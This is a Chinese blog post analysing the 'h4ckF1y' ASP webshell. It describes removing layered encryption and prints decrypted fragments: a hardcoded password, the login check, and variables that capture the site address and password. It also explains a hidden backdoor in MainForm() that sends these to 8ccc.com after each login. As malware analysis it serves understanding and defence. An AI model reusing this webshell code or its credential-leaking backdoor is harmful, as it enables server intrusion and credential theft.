“h4ckF1y” webshell的解密和后门全分析

先看看这个shell的截图

之所以拿这个shell出来时因为这个shell和先前的”一个人的战争”webshell有着关系，在那片文章我猜测那个shell是后来去后门然后再加的，我想现在的这个shell极有可能就是那个原始版本。这个shell是十三的加密，和”一个人的战争”webshell结构各方面基本上一直，只是在css方面有些差别，界面不同而已。
shell显示十三的函数加密，然后VBScript.Encode加密，层层剥离就ok。
现在说说这个shell
shell的头部

Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass=”khdwu945046″ ‘密码
mName=”h4ckF1y” ‘后门名字
SiteURL=”Http://wWw.sLenk.Net” ‘网站
Copyright=”注：请勿用于非法用途，否则后果作者概不负责。” ‘版权

这个应当是lenk联盟的东西吧。
说说shell
登录方式

if session(“web2a2dmin”)<>UserPass then
if request.form(“pass”)<>“” then
if request.form(“pass”)=UserPass then
session(“web2a2dmin”)=UserPass
response.redirect url
else
rrs”非法登录”
end if
else
si=”

“&mname&”

---

密码：

---

“&Copyright&”

”
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if

和以前的十三的差不多。
说说后门
在shell开头

URL=Request.ServerVariables(“URL”)
ServerIP=Request.ServerVariables(“LOCAL_ADDR”)
Action=Request(“Action”)
RootPath=Server.MapPath(“.”)
WWWRoot=Server.MapPath(“/”)
serveru=request.servervariables(“http_host”)&url
serverp=userpass
FolderPath=Request(“FolderPath”)
FName=Request(“FName”)
BackUrl=”

返回“

serverp获取密码，serveru获取地址，在”一个人的战争“webshell中并没有调用这个变量。
这个shell的后门隐藏在MainForm()函数中
代码为

Function MainForm()
RRS”“

直接发送密码和地址到8ccc.com进行处理。
MainForm怎么调用呢？

Case “CompactMdb”:CompactMdb FName
Case “DbManager”:DbManager()
Case “Course”:Course()
Case “ServerInfo”:ServerInfo()
Case Else MainForm()

这个函数是主框架函数，只要登录成功就马上执行，同时也执行后门程序。
附件中为加密文件
点击下载此文件
最开始出于共享的目的，发布了解密的源码，但是很多朋友劝说我，那么解密文件就不发布了。